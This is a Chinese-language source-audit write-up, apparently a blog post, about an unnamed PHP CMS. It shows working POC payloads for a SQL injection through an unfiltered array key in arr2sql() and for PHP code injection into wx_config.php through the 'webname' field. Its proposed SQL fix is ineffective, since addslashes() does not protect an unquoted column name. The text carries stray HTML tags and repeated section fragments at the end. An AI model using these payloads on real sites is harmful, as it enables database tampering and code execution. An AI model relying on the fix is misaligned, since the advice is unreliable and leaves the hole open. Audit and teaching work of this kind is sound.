源码审计实战：SQL注入与文件写入漏洞分析<\/h1>

前言<\/h2>
本文记录了对某CMS系统的源码审计过程，发现了两个安全漏洞：一个SQL注入漏洞和一个文件写入漏洞。审计过程从数据库操作函数入手，通过数据流分析追踪到可利用的前端入口点。<\/p>

1. SQL注入漏洞分析<\/h2>

1.1 漏洞根源<\/h3>

漏洞位于arr2sql()<\/code>函数中，该函数用于将数组转换为SQL语句：<\/p>

private<\/span> function<\/span> arr2sql<\/span>($arr) {
<\/span><\/span>    $s =<\/span> ''<\/span>;
<\/span><\/span>    foreach<\/span>($arr as<\/span> $k=><\/span>$v) {
<\/span><\/span>        $v =<\/span> addslashes<\/span>($v);
<\/span><\/span>        $s .=<\/span> "<\/span>$k<\/span>='<\/span>$v<\/span>',"<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> rtrim<\/span>($s, ','<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>问题点<\/strong>：<\/p>

只对数组值($v<\/code>)进行了addslashes()<\/code>转义<\/li>
数组键($k<\/code>)未经任何过滤直接拼接进SQL语句<\/li>
<\/ul>
1.2 漏洞利用链<\/h3>
1.2.1 调用arr2sql()<\/code>的函数<\/h4>

插入操作函数<\/strong>：<\/li>
<\/ol>
public<\/span> function<\/span> set<\/span>($key, $data) {
<\/span><\/span>    if<\/span>(!<\/span>is_array<\/span>($data)) return<\/span> FALSE<\/span>;
<\/span><\/span>    list<\/span>($table, $keyarr) =<\/span> $this-><\/span>key2arr<\/span>($key);
<\/span><\/span>    $data +=<\/span> $keyarr;
<\/span><\/span>    $s =<\/span> $this-><\/span>arr2sql<\/span>($data);
<\/span><\/span>    $exists =<\/span> $this-><\/span>get<\/span>($key);
<\/span><\/span>    if<\/span>(empty<\/span>($exists)) {
<\/span><\/span>        return<\/span> $this-><\/span>query<\/span>("INSERT INTO <\/span>{<\/span>$this-><\/span>tablepre<\/span>}$table<\/span> SET <\/span>$s<\/span>"<\/span>, $this-><\/span>wlink<\/span>);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        return<\/span> $this-><\/span>update<\/span>($key, $data);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
更新操作函数<\/strong>：<\/li>
<\/ol>
public<\/span> function<\/span> update<\/span>($key, $data) {
<\/span><\/span>    list<\/span>($table, $keyarr, $keystr) =<\/span> $this-><\/span>key2arr<\/span>($key);
<\/span><\/span>    $s =<\/span> $this-><\/span>arr2sql<\/span>($data);
<\/span><\/span>    return<\/span> $this-><\/span>query<\/span>("UPDATE <\/span>{<\/span>$this-><\/span>tablepre<\/span>}$table<\/span> SET <\/span>$s<\/span> WHERE <\/span>$keystr<\/span> LIMIT 1"<\/span>, $this-><\/span>wlink<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>1.2.2 前端调用点<\/h4>
找到调用update()<\/code>函数且键名可控的方法：<\/p>
public<\/span> function<\/span> ajaxset<\/span>(){
<\/span><\/span>    $id =<\/span> intval<\/span>(R<\/span>('id'<\/span>, 'P'<\/span>));
<\/span><\/span>    $cid =<\/span> intval<\/span>(R<\/span>('cid'<\/span>, 'P'<\/span>));
<\/span><\/span>    $type =<\/span> R<\/span>('type'<\/span>, 'P'<\/span>); \/\/ 可控参数
<\/span><\/span><\/span><\/span>    $txtvalue =<\/span> intval<\/span>(R<\/span>('txtvalue'<\/span>, 'P'<\/span>));
<\/span><\/span>
<\/span><\/span>    empty<\/span>($id) &&<\/span> E<\/span>(1<\/span>, '内容ID不能为空！'<\/span>);
<\/span><\/span>
<\/span><\/span>    $this-><\/span>cms_content<\/span>-><\/span>table<\/span> =<\/span> 'cms_products'<\/span>;
<\/span><\/span>    $data =<\/span> $this-><\/span>cms_content<\/span>-><\/span>get<\/span>($id);
<\/span><\/span>    $old_status =<\/span> $data['status'<\/span>];
<\/span><\/span>    $data[$type] =<\/span> $txtvalue;
<\/span><\/span>    if<\/span>($type ==<\/span> 'status'<\/span> &&<\/span> $txtvalue ==<\/span> 0<\/span>){
<\/span><\/span>        $data['whys'<\/span>] =<\/span> ''<\/span>;
<\/span><\/span>    }
<\/span><\/span>    if<\/span>(!<\/span>$this-><\/span>cms_content<\/span>-><\/span>update<\/span>($data)) {
<\/span><\/span>        E<\/span>(1<\/span>, '更新出错'<\/span>);
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...省略后续代码...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>其中R()<\/code>函数用于获取请求参数：<\/p>
function<\/span> R<\/span>($k, $var =<\/span> 'G'<\/span>) {
<\/span><\/span>    switch<\/span>($var) {
<\/span><\/span>        case<\/span> 'G'<\/span>:<\/span> $var =<\/span> &<\/span>$_GET; break<\/span>;
<\/span><\/span>        case<\/span> 'P'<\/span>:<\/span> $var =<\/span> &<\/span>$_POST; break<\/span>;
<\/span><\/span>        case<\/span> 'C'<\/span>:<\/span> $var =<\/span> &<\/span>$_COOKIE; break<\/span>;
<\/span><\/span>        case<\/span> 'R'<\/span>:<\/span> $var =<\/span> isset<\/span>($_GET[$k]) ?<\/span> $_GET :<\/span> (isset<\/span>($_POST[$k]) ?<\/span> $_POST :<\/span> $_COOKIE); break<\/span>;
<\/span><\/span>        case<\/span> 'S'<\/span>:<\/span> $var =<\/span> &<\/span>$_SERVER; break<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> isset<\/span>($var[$k]) ?<\/span> $var[$k] :<\/span> null<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>1.3 漏洞利用<\/h3>
POC<\/strong>：<\/p>
id=503&type=pic%3ddatabase(),local&value=
<\/code><\/pre>
效果<\/strong>：<\/p>

将pic<\/code>字段更新为当前数据库名<\/li>
<\/ul>
2. 文件写入漏洞分析<\/h2>
2.1 漏洞根源<\/h3>
FW()<\/code>函数用于写入文件内容：<\/p>
function<\/span> FW<\/span>($filename, $data) {
<\/span><\/span>    $dir =<\/span> dirname<\/span>($filename);
<\/span><\/span>    is_dir<\/span>($dir) ||<\/span> mkdir<\/span>($dir, 0755<\/span>, true<\/span>);
<\/span><\/span>    return<\/span> file_put_contents<\/span>($filename, $data);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 漏洞利用点<\/h3>
在微信支付配置功能中发现可控的文件写入：<\/p>
public<\/span> function<\/span> setting<\/span>() {
<\/span><\/span>    if<\/span>(empty<\/span>($_POST)) {
<\/span><\/span>        \/\/ 显示表单代码...
<\/span><\/span><\/span><\/span>    } else<\/span> {
<\/span><\/span>        _trim<\/span>($_POST);
<\/span><\/span>        $weixin =<\/span> R<\/span>('weixin'<\/span>, 'P'<\/span>);
<\/span><\/span>        $this-><\/span>kv<\/span>-><\/span>xset<\/span>('weixin'<\/span>, $weixin, 'pay_cfg'<\/span>);
<\/span><\/span>        
<\/span><\/span>        $wx_notice =<\/span> ''<\/span>;
<\/span><\/span>        if<\/span>(!<\/span>empty<\/span>($weixin)){
<\/span><\/span>            $wxFile =<\/span> PLUGIN_PATH<\/span>.<\/span>'nz_wxpay\/wx_config.php'<\/span>;
<\/span><\/span>            $s =<\/span> file_get_contents<\/span>($wxFile);
<\/span><\/span>            $s =<\/span> preg_replace<\/span>("#const APPID = '\w*';#"<\/span>, "const APPID = '"<\/span>.<\/span>addslashes<\/span>($weixin['APPID'<\/span>]).<\/span>"';"<\/span>, $s);
<\/span><\/span>            $s =<\/span> preg_replace<\/span>("#const MCHID = '\w*';#"<\/span>, "const MCHID = '"<\/span>.<\/span>addslashes<\/span>($weixin['MCHID'<\/span>]).<\/span>"';"<\/span>, $s);
<\/span><\/span>            $s =<\/span> preg_replace<\/span>("#const KEY = '\w*';#"<\/span>, "const KEY = '"<\/span>.<\/span>addslashes<\/span>($weixin['KEY'<\/span>]).<\/span>"';"<\/span>, $s);
<\/span><\/span>            $s =<\/span> preg_replace<\/span>("#const COMPANY = '\w*';#"<\/span>, "const COMPANY = '"<\/span>.<\/span>R<\/span>('webname'<\/span>,'P'<\/span>).<\/span>"';"<\/span>, $s);
<\/span><\/span>            if<\/span>(!<\/span>FW<\/span>($wxFile, $s)){
<\/span><\/span>                $wx_notice =<\/span> '！但微信配置文件写入失败...'<\/span>;
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>        \/\/ ...省略后续代码...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>问题点<\/strong>：<\/p>

webname<\/code>参数未经任何过滤直接写入文件<\/li>
其他参数(APPID<\/code>、MCHID<\/code>、KEY<\/code>)都经过addslashes()<\/code>处理<\/li>
<\/ul>
2.3 漏洞利用<\/h3>
POC<\/strong>：<\/p>
weixin[APPID]=1155&weixin[MCHID]=5555555&weixin[KEY]=11333311&weixin['APPSECRET']=1111&webname=aaaaaaaaa';} phpinfo();?>\/*
<\/code><\/pre>
效果<\/strong>：<\/p>

在wx_config.php<\/code>文件中写入PHP代码<\/li>
访问该文件可执行任意PHP代码<\/li>
<\/ul>
2.4 利用限制<\/h3>

需要后台管理员权限<\/li>
依赖COMPANY<\/code>常量初始值为英文（正则\w*<\/code>无法匹配中文）<\/li>
<\/ol>
总结<\/h2>
SQL注入漏洞修复建议<\/h3>

对数组键名也进行过滤：<\/li>
<\/ol>
private<\/span> function<\/span> arr2sql<\/span>($arr) {
<\/span><\/span>    $s =<\/span> ''<\/span>;
<\/span><\/span>    foreach<\/span>($arr as<\/span> $k=><\/span>$v) {
<\/span><\/span>        $k =<\/span> addslashes<\/span>($k); \/\/ 增加对键名的过滤
<\/span><\/span><\/span><\/span>        $v =<\/span> addslashes<\/span>($v);
<\/span><\/span>        $s .=<\/span> "<\/span>$k<\/span>='<\/span>$v<\/span>',"<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> rtrim<\/span>($s, ','<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>文件写入漏洞修复建议<\/h3>

对webname<\/code>参数进行严格过滤：<\/li>
<\/ol>
$company =<\/span> preg_replace<\/span>('\/[^a-zA-Z0-9_\-\s]\/'<\/span>, ''<\/span>, R<\/span>('webname'<\/span>,'P'<\/span>));
<\/span><\/span>$s =<\/span> preg_replace<\/span>("#const COMPANY = '\w*';#"<\/span>, "const COMPANY = '"<\/span>.<\/span>$company.<\/span>"';"<\/span>, $s);
<\/span><\/span><\/code><\/pre>
限制文件写入内容，避免PHP代码执行<\/li>
<\/ol>
审计方法论<\/h2>

从底层数据库操作函数入手，向上追踪调用链<\/li>
关注用户输入点与危险函数的结合<\/li>
特别注意数组键名、文件路径等容易被忽略的参数<\/li>
正则表达式限制可能导致的安全绕过<\/li>
<\/ol>

源码审计实战：SQL注入与文件写入漏洞分析<\/h1>

前言<\/h2> 本文记录了对某CMS系统的源码审计过程，发现了两个安全漏洞：一个SQL注入漏洞和一个文件写入漏洞。审计过程从数据库操作函数入手，通过数据流分析追踪到可利用的前端入口点。<\/p>

1. SQL注入漏洞分析<\/h2>

1.2 漏洞利用链<\/h3>

2. 文件写入漏洞分析<\/h2>

总结<\/h2>

审计方法论<\/h2> 从底层数据库操作函数入手，向上追踪调用链<\/li> 关注用户输入点与危险函数的结合<\/li> 特别注意数组键名、文件路径等容易被忽略的参数<\/li> 正则表达式限制可能导致的安全绕过<\/li> <\/ol>

前言<\/h2>
本文记录了对某CMS系统的源码审计过程，发现了两个安全漏洞：一个SQL注入漏洞和一个文件写入漏洞。审计过程从数据库操作函数入手，通过数据流分析追踪到可利用的前端入口点。<\/p>

审计方法论<\/h2>

从底层数据库操作函数入手，向上追踪调用链<\/li>
关注用户输入点与危险函数的结合<\/li>
特别注意数组键名、文件路径等容易被忽略的参数<\/li>
正则表达式限制可能导致的安全绕过<\/li> <\/ol>